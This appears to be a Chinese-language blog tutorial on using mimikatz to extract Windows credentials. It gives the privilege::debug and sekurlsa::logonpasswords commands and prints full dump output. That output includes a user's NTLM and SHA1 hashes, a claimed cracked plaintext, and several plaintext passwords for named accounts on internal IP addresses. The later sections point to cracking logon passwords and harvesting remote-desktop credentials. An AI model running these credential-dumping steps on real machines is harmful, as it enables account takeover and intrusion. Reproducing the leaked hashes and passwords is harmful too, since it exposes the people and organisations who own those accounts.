11--使用 mimikatz 提取 windows凭据的密码

时间:2024-11-10 17:55:37

mimikatz

.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从  进程里获取windows处于active状态账号的明文密码mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:/ 

1mimikatz凭据密码破解

参考网址

/

/kevinstoic/article/details/9004784


*想要知道windows凭据的密码,则么办呢?

安装软件  mimikatz_trunk

开始:必须以管理员身份运行

 

 

  .#####.   mimikatz 2.1.1 (x64) built on Jun 16 201818:49:05 - lil!

 .## ^ ##.  "A La Vie, A L'Amour" - ()

 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` (benjamin@ )

 ## \ / ##       > /mimikatz

 '## v ##'       Vincent LE TOUX             ( @ )

  '#####'        > /   ***/

 

mimikatz # privilege::debug

Privilege '20' OK

 

mimikatz # sekurlsa::logonpasswords

 

Authentication Id : 0 ; 236664527 (00000000:0e1b36cf)

Session           :Interactive from 6

User Name         :xu wei dong

Domain            :DESKTOP-NNIBHTL

Logon Server      :DESKTOP-NNIBHTL

Logon Time        :2018/6/26 15:35:58

SID               :S-1-5-21-3375334107-2599323197-3143766014-1001

        msv :

         [00000003]Primary

         * Username :xu wei dong

         *Domain   : DESKTOP-NNIBHTL

         * NTLM     : c488e5021502c7dfd4fa8560306644bd

         * SHA1     : dd3e3a871fe28080b69218d556250f5170d68184

        tspkg :

        wdigest :

         * Username :xu wei dong

         *Domain   : DESKTOP-NNIBHTL

         * Password :(null)

        kerberos :

         * Username :xu wei dong

         *Domain   : DESKTOP-NNIBHTL

         * Password :(null)

        ssp :

        credman :

         [00000000]

         * Username :xwd

         *Domain   : 192.168.37.129

         * Password :123456

         [00000001]

         * Username :yushanggroup\rongziscan

         *Domain   : 10.12.0.1

         * Password :111qqq.

         [00000002]

         * Username :zlfkshare

         *Domain   : 10.254.8.20

         * Password :hywin123

 

 

 

2,破解windows开机密码

 

/

密文:如下

 * NTLM    c488e5021502c7dfd4fa8560306644bd

翻译出来是 80134140

 

 

 

3,破解远程终端凭据,获取服务器密码

 

/a/197604840_99907709

 

在远程终端(3389)、虚拟桌面中抓取密码的方法:

/